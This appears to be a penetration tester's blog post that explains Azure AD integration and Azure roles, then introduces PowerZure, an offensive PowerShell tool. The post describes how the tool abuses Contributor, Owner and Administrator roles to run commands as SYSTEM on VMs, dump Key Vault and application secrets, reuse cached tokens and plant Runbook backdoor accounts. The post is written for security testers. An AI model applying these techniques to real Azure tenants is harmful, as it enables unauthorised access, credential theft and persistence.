    Azure AD is not a replacement for on-premise AD, nor is it the same as Azure (i.e. AzureAD vs. Azure). AzureAD is a management platform for AD from the cloud (reset passwords, create users, add users to groups, etc.) and used as the authentication piece into Azure as a whole (as well as O365). This still introduces several interesting attack paths that may also effect on-premise AD.

    There are three primary ways of integrating on-premise Active Directory to Azure AD, Password Hash Synchronization (PHS), Pass Through Authentication (PTA), and Federated Services (ADFS). PHS and PTA both have potential attack vectors associated with them.

    Password Hash Synchronization

    With Password Hash Synchronization (PHS), the passwords from on-premise AD are actually sent to the cloud, similar to how domain controllers synchronize passwords between each other via replication. This is done from a service account that is created with the installation of AD Connect.

    This introduces a unique attack path where if the synchronization account is compromised, it has enough privileges that it potentially could lead to the compromise of the on-premise AD forest, as that account is granted replication rights which are needed for DCSync. Realistically, the sync account password should not be known and thus will not be logged in anywhere, however Dirk-jan, during his Troopers 2019 presentation, discovered how to reverse the account’s password from the SQL DB and made a script that would do the hard work.

    Pass Through Authentication

    Pass through authentication keeps the passwords on-premise but also allows the users to have a single password for Azure and on-premise. For example, when a user logins to Outlook on the web, they enter their credentials into the web portal (Azure AD), which Azure then uses PKI to encrypt the credentials and sends them to an agent on-premise. The agent decrypts the credentials and validates it against the DC, which returns a status back to the agent, which is then relayed back to Azure AD.

    It’s possible to perform DLL injection into the PTA agent and intercept authentication requests, which include credentials in clear-text. @_xpn_ has written an excellent blog post on doing this.

    Active Directory Federated Services (ADFS)

    Azure AD can connect back to on-premise via ADFS. With ADFS, Azure AD is set as a trusted agent for federation and allows login with on-premise credentials.

    Access Control

    Policies

    Policies in Azure do not do the actual controlling of access, they are meant to enforce different rules and effects for resources. For example, with policy, you can restrict certain sizes of a VM in your subscription, or make sure the Administrators group in a VM doesn’t have too many members. Policies are broken into two parts — the policies themselves, and policy definitions. An example is shown below.

    Figure 7: Policy Assignment page in Azure.

    Figure 8: Choosing a specific policy to assign within Azure.

    Policies contain multiple definitions, where definitions are what does the auditing/action. Thus, you can create a definition and apply it to multiple policies.

    Role Based Access Control (RBAC) and Roles

    Azure offers a more granular control to security with RBAC, in the form of Roles. It differs from Policies by focusing on user actions at different scopes. You might be added to the Contributor role for a resource group, allowing you to make changes to that resource group. RBAC in Azure allows for custom roles, however many businesses rely on the built-in roles. The list of roles and their access can be found here. To confuse you more, there’s a difference between Azure roles (referred to as Azure RBAC) and AzureAD roles. The primary difference, is that AzureAD roles only affect AzureAD and do not have any influence over resources within Azure. With this being said, the exclusion to that is the Global Administrator role, which has the option (literally a toggle switch in the Azure Portal) to also give themselves (Global Administrator) ownership of all resources within Azure itself.

    For the purpose of this this article, only the following roles within Azure RBAC will be discussed:

    • Owner
    • Contributor
    • Reader

    The reason being is there are far too many roles to go in depth on all of them, with also the additional option of custom roles. Within the Azure portal, you can read a resource’s security settings, such as which roles can access or make changes to that resource. This can be viewed in the Identity Access & Management (IAM) tab in the Azure portal if you prefer not to use the CLI.

    Figure 9: Checking a user’s role in IAM within Azure.

    Resources can have their own specific access control list (ACL), so you can add a user to only be able to view that specific resource. It’s important to note that roles/permissions are inheritance-based, meaning if a user is in the Contributor role for the resource group, they will effectively have Contributor access to every resource within the resource group. Even if they are only assigned to the reader role for a resource within that resource group, since they have Contributor access to the whole group they will be a Contributor to that resource.

    Attacking Azure and Introducing PowerZure

    With several components in Azure, there are several different avenues for attacks within the platform. These attack vectors leverage misconfigurations or design flaws, some of which are listed here. The major question that needs to be addressed, is what is the goal of testing an Azure instance? This will depend on the engagement and scope of work, so there’s multiple answers to that, however in this article the purpose is to demonstrate the implications of certain roles and resources within Azure and how those can be abused both from a privilege escalation standpoint and an overall data extraction standpoint to possibly achieve that goal.

    After interacting with Azure via CLI and the az module, I realize there is a great opportunity to script out many of the tasks an attacker would do within Azure. As a result, I’ve created PowerZure, a PowerShell project that’s purpose is to make interacting with Azure a bit easier, as well as adding offensive capability.

    PowerZure

    PowerZure leverages three PowerShell modules for Azure:

    • Azure CLI
    • Azure PowerShell
    • AzureAD PowerShell

    Each module does things the other cannot, hence the need for all three. However, PowerZure mostly relies on the Azure CLI module.

    PowerZure has several functions available and they are broken out in reference to their purpose:

    • Operational — Functions that will cause an operation within Azure
    • Information Gathering — Functions that gather information on resources in Azure
    • Data Exfiltration — Functions that will exfiltrate data

    For the sake of length and time, not all functions will be covered, but it is necessary to explain the purpose of some and the details around what is happening under the hood.

    Startup

    Since PowerZure requires the az module, After importing PowerZure ipmo .\PowerZure, it will download the modules if not already present.

    For a full coverage of PowerZure, check out the documents on readthedocs.io

    https://powerzure.readthedocs.io/en/latest/index.html

    It then requires sign in before usage of the functions. There’s three types of logins for Azure:

    1. Interactive. Simply type az login and you will be directed to a login page. If using MFA, you must login via Interactive mode.
    2. Cached token. Tokens for Azure are cached in

    C:\Users\[Name]\.Azure\accessTokens.json

    So after you login once, the token is cached. This allow shows the possibility that an access token can be stolen and re-used.

    3. Pass in credentials. You can login (if MFA is not enabled and you’re using a non-personal account) via az login -u User -p Password

    Once logged in, PowerZure will display your username, the subscriptions you have access to, your roles, and your Azure AD group memberships. Knowledge of what Role the user has is key to figuring out what you can do operationally and what functions you can use within PowerZure. PowerZure’s help menu specifically lists out which roles are needed to run the function. This is purely in reference to the built-in roles, as custom roles are unpredictable. To view the help menu, the command is PowerZure -h

    Figure 10: PowerZure’s help menu

    In addition, each function can be used with Get-Help to get information or syntax.

    Function 11: Get-Help displays the syntax for a function

    Before further operation of PowerZure, a default subscription must be set if there are multiple subscriptions so the script will know which to operate against. A subscription can be set via

    Set-Subscription -Id [idgoeshere]

    The subscription IDs are printed once you login to Azure with PowerZure. If only one subscription is present, this can be ignored.

    Role Abuse

    Each of the Global roles (Administrator, Owner, Contributor, Reader) will be broken down into what can be accomplished, why it’s necessary to accomplish, and how PowerZure helps.

    Reader

    The Global Reader role has read-only access for components in Azure (Subscriptions, Policies, Resources, etc.) This by itself can grant an attacker useful information. For example, if the attacker compromises an account with Reader privileges, they can read Runbooks. Runbooks fall under the “Automation Accounts” resource. An example is shown below

    Figure 10: Viewing a Runbook with the ‘Reader’ role. Notice ‘Edit’ and ‘Start’ are grayed out.

    This can be useful to see if there’s any hard-coded credentials within those Runbooks.

    As a Reader, you can also read several other resource’s details to search for hard-coded credentials or other potentially interesting information, including:

    • Logic apps
    • Deployment Templates
    • Virtual Networks (Potentially useful to view new targets/address spaces)
    • Export Templates on Virtual Machines
    • Connection Strings in Azure SQL
    • Configurations on several other resources/applications

    PowerZure can be leveraged to do a lot of enumeration as a Reader. For example, gathering all users, groups, roles, etc. Runbooks can also be read. In PowerZure, Runbooks can be listed via Get-Runbooks

    Figure 12: Listing Runbooks in PowerZure

    From here, the Runbooks can be obtained with Get-RunbookContent

    Figure 13: Displaying the contents of a Runbook

    Readers have access to all of the functions listed under ‘Information Gathering’, which can be found here.

    Contributor

    Contributor role allows you to actually edit resources and services within Azure, instead of just reading properties. Several attack vectors are present from the Contributor role that can be exploited with PowerZure.

    • Execute-Command will execute a supplied command on a targeted VM. As Contributor, these commands are executed as SYSTEM.

    Figure 14: Executing ‘whoami’ on a Win10 VM shows commands are ran as SYSTEM by default

    • Execute-MSBuild is a function that will take in a MSBuild payload and execute it. By default, Windows VMs deployed with Azure’s templates will have .NET 4.0 installed.

    • Execute-Program will upload and execute any file that is supplied. It works by identifying a storage container, uploads the supplied file through Get-AzVMCustomScriptExtension , then executes that program via az vm run invoke. This entire process does take time (~2 mins) unfortunately, due to the dynamic location of where the file is uploaded to on the VM.
    • Get-AllKeyVaultContents will automatically go through a Key Vault, check for access, and print the results of any secrets, keys, or certificates. By default, Key Vaults only allow access to their owners, however if a user has Global Contributor, they can edit the access policies on the Key Vault and give themselves access. PowerZure does this automatically.

    Figure 16: Revealing the secrets in a Key Vault

    • Get-AllAppSecrets will return all passwords or certificate credentials for any Application that has them stored.
    • Get-AllSecrets is a catch-all; it will run return all Key Vault secrets/keys/credentials, App Secrets, and Automation Account Run-as credentials.

    Contributors also can download disks from virtual machines.

    • Get-AvailableVMDisks will list the available disks that are downloadable. This can then give the information needed for
    • Get-VMDisk which will generate a URL to download that disk. A fair warning, though, disks can be massive in size.

    Owner

    Owners can do everything a Contributor can do, but they have one additional feature: They can also give permission to a resource they own. This is particularly useful as an attacker because it provides many opportunities to create a backdoor into a resource. For example, if an Owner controls a Virtual Machine resource, they can explicitly grant any user Owner status over that Virtual Machine. In PowerZure, this is accomplished via the Set-Role function. In addition, existing roles can be checked via Get-RolesUser function.

    Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest

    Figure 17: Adding a user to the Owner role for a VM resource.

    Administrator

    Administrators over a subscription have the ability to do everything an Owner can, plus create additional users and groups within Azure AD. They also have the ability to assign roles for the subscription. PowerZure has the ability to utilize an Administrator account to create a backdoor with a Runbook.

    • Create-Backdoor , when executed, will create a Runbook. Inside the Runbook is instructions to create a new user and assign them to the Owner role, then generate a Webhook which will output a URI. This URI can then be passed into Execute-Backdoor.
    • Execute-Backdoor will execute the Runbook. An attacker will create a backdoor in case the current account that is in use has it’s password changed. With Administrator role needed to create a user, a new co-administrator should be made as well to achieve this in the Runbook, in case credentials to the user in the Administrator role are changed.

    Use Case

    So what is the point of PowerZure if you can accomplish all of this via the Azure Portal online? While true, PowerZure was written to help automate and script many of the tedious tasks that are endured when enumerating Azure through the Portal, e.g. listing all users of every group. The use case of the tool is situational. One example, is if a penetration tester or red-teamer compromises a computer and realizes the user has logged into Azure CLI before (not unusual for System Admins) and they have an accessToken in their .Azure file. The tester could then take that token and impersonate the user in Azure, where they now have Contributor access to several different VMs. In addition, operations within the portal do not always return the full details of the job. With az returning the raw JSON, PowerZure abstracts the JSON to give relevant details, or in some cases, displays the raw output.

    Final Thoughts

    Azure usage has increased dramatically in the past few years and AzureAD is becoming more popular to use. My opinion is that it is not a replacement for on-premise AD at this time, however I do foresee Microsoft adding more functionality to AzureAD to allow businesses to interact more with on-premise. This blog post was meant to establish a base layer of knowledge on the platform and establish some common misconfigurations that can be exploited with PowerZure.

    The one thing this article did allude to was the detections around said tactics. The detection capabilities within Azure are heavily gate-kept behind Azure’s services and the default detection capabilities leave much to be desired, often requiring work-arounds. As a result, this requires more detail that I believe would be best detailed in a follow up article. Said article will follow this one in regards to detections within Azure.

    @haus3c

    Sources

    1. PowerZure Project https://github.com/hausec/PowerZure
    2. NetSPI and Karl Fosaaen

    2. FoxIT and Dirk-Jan

    3. Trimarc and Metcalf

    4. XPN’s blog